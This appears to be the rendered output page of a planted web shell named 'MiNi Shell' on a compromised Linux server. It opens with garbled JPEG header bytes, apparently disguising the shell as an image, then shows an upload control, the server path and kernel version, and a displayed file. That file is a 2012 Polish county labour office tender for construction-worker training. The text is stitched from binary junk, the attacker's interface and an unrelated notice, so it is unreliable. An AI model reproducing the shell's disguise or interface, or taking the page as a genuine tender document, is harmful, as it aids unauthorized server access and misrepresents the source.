JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121002/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121002/376368-N-2012.html

<p class="kh_header"><b>Sępólno Krajeńskie: PRACOWNIK REMONTOWO - BUDOWLANY</b><br>
<b>Numer ogłoszenia: 376368 - 2012; data zamieszczenia: 02.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Tadeusza Kościuszki 11, 89-400 Sępólno Krajeńskie, woj. kujawsko-pomorskie, tel. 0-52 388 13 50, faks 0-52 388 53 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pup.sepolno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRACOWNIK REMONTOWO - BUDOWLANY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa: organizacja i przeprowadzenie szkolenia dla  7 osób bezrobotnych w zakresie  Pracownik remontowo - budowlany
a)	Przewidywany  termin wykonania  zamówienia:   05.11.2012 r. - 30.11.2012 r.
b)	Szkolenie trwać musi 150 godzin zegarowych, w tym 120 godzin zegarowych zajęć praktycznych u pracodawców z terenu powiatu sępoleńskiego.
c)	Przeciętna liczba godzin w tygodniu nie może być mniejsza niż 25 godzin zegarowych na osobę (godzina zegarowa zajęć teoretycznych liczy 60 minut i obejmuje zajęcia edukacyjne 45 minut oraz przerwę liczącą średnio 15 minut; 1 godzina zegarowa zajęć praktycznych równa się 60 minutom bez przerwy).
c)  Wspólny Słownik Zamówień (CPV):  80530000-8
Szczegółowy opis przedmiotu zamówienia:
a)	Celem szkolenia jest przyuczenie uczestników projektu do podjęcia pracy w charakterze pracownika remontowo-budowlanego. 
Program szkolenia musi obejmować, między innymi, poniższą tematykę:
- przepisy bhp i p. poż. w budownictwie,
- zasady udzielania pierwszej pomocy,
- materiałoznawstwo  w zakresie surowców i materiałów używanych do robót remontowo-budowlanych,
- techniki i technologie wykańczania wnętrz,
- maszyny i urządzenia w pracy pracownika remontowo-budowlanego,
- przygotowanie podłoża,
- gipsowanie, malowanie, tynkowanie, kładzenie gładzi, płytek, 
- wydzielanie pomieszczeń z zastosowaniem ścianek działowych,
- wykonywanie prac wykończeniowych, 
- wykonywanie dociepleń, 
- prace porządkowe, magazynowanie i konserwacja sprzętu i materiałów.
b)	Program szkolenia (zakres i jakość) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych, dostępnych 
w bazach danych prowadzonych przez MPiPS.
c)	Szkolenie finansowane będzie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy, Tytuł projektu Aktywni zawodowo. 
W związku z powyższym Wykonawca zobowiązany będzie do:
- informowania osób o finansowaniu realizacji projektu przez Unię Europejską,
- oznaczenia materiałów szkoleniowych,
- oznaczenia wszelkich dokumentów sporządzanych w ramach realizacji zamówienia (m.in.   zaświadczenia o ukończeniu szkolenia),
- oznaczenia miejsca realizacji kursu.
d)	Wykonawca zobowiązany jest do skierowania uczestników kursu na badania lekarskie, jeżeli są wymagane oraz do sfinansowania tych badań oraz zobowiązany jest do przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. 
e)	Zajęcia muszą odbywać się w dni robocze od poniedziałku do piątku (z wyłączeniem świąt) Maksymalna liczba godzin szkoleniowych w ciągu jednego dnia wynosi osiem.
f)	Wykonawca zobowiązany jest do zabezpieczenia odpowiednich pomieszczeń
do prowadzenia zajęć zgodnie z wymogami polskiego prawa - sale muszą być odpowiednio wyposażone, oświetlone, nagłośnione, muszą spełniać wymogi bhp, p. poż.  oraz posiadać zaplecze sanitarne.
g)	Wykonawca zobowiązany jest zapewnić nieodpłatnie środki ochrony każdemu kursantowi (skierowanemu przez Zamawiającego) oraz zobligować do ich stosowania jeżeli przepisy szczegółowe w zakresie bhp wymagają stosowania takich środków przy wykonywaniu zadań.
h)	Do realizacji zamówienia Wykonawca zapewni uczestnikom odpowiednie materiały szkoleniowe, tj. długopis, co najmniej 60 kartkowy zeszyt lub notatnik, materiały dydaktyczne niezbędne do utrwalenia wiadomości, które po zakończeniu realizacji szkolenia przejdą na ich własność, teczkę lub segregator na otrzymywane materiały. Materiały należy rozdać uczestnikom szkolenia w pierwszym dniu szkolenia lub na bieżąco zgodnie 
z realizowanym tematem zajęć, a potwierdzenie ich odbioru Wykonawca przekaże Zleceniodawcy wraz z dokumentacją szkolenia. 
i)	Wszystkie zajęcia muszą być prowadzone z wykładowcą / instruktorem / trenerem.
j)	Wykonawca zapewni nadzór wewnętrzny, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.
k)	Sposób prowadzenia zajęć powinien uwzględnić zróżnicowany poziom uczestników.
l)	Ukończenie szkolenia z wynikiem pozytywnym musi być potwierdzone stosownym certyfikatem, zaświadczeniem. Po ukończeniu szkolenia Wykonawca zobowiązuje się dostarczyć kopię zaświadczeń, certyfikatów o ukończonym kursie w ciągu 5 dni od dnia zakończenia szkolenia.
m)	Termin realizacji przedmiotu zamówienia może ulec zmianie w zależności od terminu rozstrzygnięcia postępowania - wyboru Wykonawcy.
n)	Zamawiający zastrzega sobie możliwość zmiany terminu szkolenia  w przypadku, gdy pełna grupa szkoleniowa osób uprawnionych nie zostanie na czas skompletowana.
Miejsce szkolenia:  POWIAT SĘPOLEŃSKI..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 05.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonych do oferty: 
-	 ksera wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z ustawą 
o promocji zatrudnienia i instytucjach rynku pracy) wraz z informacją, że jest on aktualny
 na dzień składania oferty lub oświadczenia - załącznik nr 12. 
-	koncesji, zezwolenia lub licencji, itp.  na prowadzenie szkoleń - jeżeli posiada.
Wykonawca potwierdzi spełnianie tego warunku, jeżeli dostarczy wymienione oświadczenie oraz dokumenty. Zamawiający zweryfikuje złożone oświadczenie o dokonaniu wpisu z informacją
 na stronie internetowej http://www.ris.praca.gov.pl</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności szkoleniowej jest krótszy - w tym okresie, usług szkoleniowych w zakresie przedmiotu zamówienia wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie - według załącznika nr 7.
Wykonawca potwierdzi spełnianie tego warunku, jeżeli wykaże iż przeprowadził szkolenia 
z zakresu przedmiotu zamówienia dla co najmniej 15 osób i przedstawi dokumenty o należytym wykonaniu tych usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - według załącznika nr 9. Wykaz powinien zawierać informacje na temat sali szkoleniowej, jej wyposażenia, miejsca prowadzenia zajęć praktycznych, jeżeli wymaga tego zakres szkolenia oraz zaplecza sanitarnego. Wymagana jest również informacja na temat dysponowania potencjałem technicznym  na potrzeby szkolenia. 
Wykonawca potwierdzi spełnienie tego warunku, jeżeli wykaz będzie zawierał  pomieszczenia, plac, dla wymienionej w przedmiocie zamówienia  ilości osób, zlokalizowane w odpowiednio przystosowanym budynku, miejscu przeprowadzenia zajęć teoretycznych i praktycznych, wyposażone w odpowiedni sprzęt, maszyny lub urządzenia techniczne oraz pomoce dydaktyczne
z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych 
za świadczenie usług - załącznik nr 8, które będą realizować przedmiot zamówienia oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia - załącznik nr 4.
Wykonawca potwierdzi spełnianie warunku, gdy wykaz będzie zwierał  co najmniej 2 osoby posiadające odpowiednie kwalifikacje, wykształcenie, przygotowanie, niezbędną wiedzę oraz doświadczenie do prawidłowej realizacji przedmiotu zamówienia wraz z informacją o podstawie dysponowania tymi osobami oraz dołączy oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy - załącznik nr 5 o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz oświadczenia o posiadaniu polisy lub innego sposobu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia.
Wykonawca potwierdzi spełnianie warunku  załączając do oferty  stosowne  oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>e)	ksero wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z ustawą 
o promocji zatrudnienia i instytucjach rynku pracy) wraz z informacją, że jest on aktualny na dzień składania oferty lub oświadczenie - załącznik nr 12, licencje, zezwolenia, koncesje, itp.,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Doświadczenie Wykonawcy - 30</li>
<li>3 - Posiadanie certyfikatów jakości usług - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególnie uzasadnionych przypadkach Zamawiający przewiduje możliwość wprowadzenia zmian w umowie dotyczących:
a)	zmniejszenia liczby osób, terminu i kosztu w trakcie jego realizacji w przypadku wystąpienia sytuacji, których nie można było przewidzieć w chwili zawarcia umowy - koszty szkolenia będą wówczas proporcjonalne do liczby osób lub stopnia wykonania zamówienia,
b)	zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy. W przypadku zmiany wykładowcy Wykonawca zobowiązany jest zapewnić, aby nowy wykładowca posiadał co najmniej kwalifikacje, wykształcenie i doświadczenie osoby, która została wykazana w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia,
c)	zmiany miejsca realizacji szkolenia wymienionego w ofercie, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
d)	zmiany harmonogramu zajęć  i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy - w uzasadnionych przypadkach i za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.sepolno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Tadeusza Kościuszki 11
89-400 Sępólno Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy
ul. Tadeusza Kościuszki 11
89-400 Sępólno Krajeńskie
sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie finansowane będzie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy, Tytuł projektu Aktywni zawodowo..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com